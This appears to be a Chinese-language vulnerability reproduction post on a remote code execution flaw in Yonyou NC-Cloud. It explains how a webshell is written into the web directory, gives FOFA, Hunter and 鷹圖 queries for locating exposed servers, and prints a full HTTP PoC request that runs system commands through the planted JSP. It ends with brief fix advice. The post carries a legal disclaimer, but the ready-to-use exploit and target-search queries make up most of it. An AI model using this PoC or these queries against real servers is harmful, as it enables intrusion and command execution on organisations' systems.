免責(zé)聲明：請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，所產(chǎn)生的一切不良后果與文章作者無(wú)關(guān)。該文章僅供學(xué)習(xí)用途使用。

一、漏洞介紹

該漏洞是通過請(qǐng)求特定的接口，然后調(diào)用"nc.itf.iufo.IBaseSPService"服務(wù)中的"saveXStreamConfig"方法進(jìn)行請(qǐng)求；直接往webapps/nc_web/目錄寫馬。最后訪問剛才寫的馬，調(diào)用 Runtime.getRuntime().exec(“command”) 來執(zhí)行系統(tǒng)命令，并通過getInputStream()獲取該命令的輸出流；然后IOUtils.toString() 方法將輸出流轉(zhuǎn)換為字符串。

二、資產(chǎn)搜索

FOFA：app=“用友-NC-Cloud”
鷹圖：web.title=“大型企業(yè)數(shù)字化平臺(tái)”
Hunter：web.body=“uap/rbac”

三、漏洞復(fù)現(xiàn)

通過接口寫馬，把馬寫到web目錄：webapps/nc_web/

PoC

POST /0811.jsp?error=bsh.Interpreter HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ifconfig").getInputStream())

小龍POC檢測(cè)腳本:

小龍POC傳送門: 小龍POC工具

四、修復(fù)建議

1.更新至最新版本

2.waf配置規(guī)則攔截敏感字符：eval(param、param.error等